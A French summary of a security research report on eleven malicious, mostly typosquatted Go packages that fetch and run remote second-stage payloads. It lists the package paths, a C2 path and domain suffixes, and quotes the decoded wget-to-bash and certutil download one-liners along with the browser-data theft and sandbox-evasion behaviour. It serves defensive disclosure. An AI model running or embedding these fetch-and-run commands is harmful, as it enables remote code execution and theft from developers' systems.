Selon le Threat Research Team de Socket, onze packages Go malveillants (dont dix encore en ligne) — dont huit sont des typosquats — recourent à une routine d’obfuscation par index identique et déploient un second étage depuis des C2 en .icu et .tech, avec un impact potentiel sur les développeurs et systèmes CI qui les importent.

• Découverte et mécanisme: le code exécute silencieusement un shell, récupère un payload de second étage depuis un ensemble interchangeable d’endpoints C2 et l’exécute en mémoire. La plupart des C2 partagent le chemin « /storage/de373d0df/a31546bf ». Six des dix URLs restent accessibles, offrant à l’attaquant un accès à la demande aux environnements affectés. Les binaires ELF/PE observés effectuent un inventaire hôte, lisent des données de navigateurs et beaconnent vers l’extérieur, souvent après un délai initial d’une heure pour évasion de sandbox.

• Packages impliqués (huit annoncés, liste fournie) :

  • github.com/stripedconsu/linker
  • github.com/agitatedleopa/stm
  • github.com/expertsandba/opt
  • github.com/wetteepee/hcloud-ip-floater
  • github.com/weightycine/replika
  • github.com/ordinarymea/tnsr_ids
  • github.com/ordinarymea/TNSR_IDS
  • github.com/cavernouskina/mcp-go
  • github.com/lastnymph/gouid
  • github.com/sinfulsky/gouid
  • github.com/briefinitia/gouid

• TTPs (techniques observées) ⚙️:

  • Usage d’un construct exec.Command(’/bin/sh’,’-c’, <obfusqué>)
  • Décodage par tableau pour reconstruire une one-liner:
    • Unix: « wget -O - | /bin/bash & »
    • Windows: « certutil.exe -urlcache -split -f %TEMP%\appwinx64.exe » puis démarrage en arrière-plan
  • Second étage ELF/PE: collecte d’infos hôte, lecture de données navigateur, beaconing
  • Évasion: temporisation d’environ une heure avant activité

• IOCs et artefacts 📌:

  • Endpoints C2: domaines en .icu et .tech
  • Chemin commun des C2: /storage/de373d0df/a31546bf
  • Référentiels Go malveillants: voir liste ci-dessus (incluant plusieurs typosquats)

Type d’article: publication de recherche décrivant une campagne de compromission de la chaîne d’approvisionnement via des packages Go, avec détails sur les TTPs et IOCs.

🔗 Source originale : https://socket.dev/blog/11-malicious-go-packages-distribute-obfuscated-remote-payloads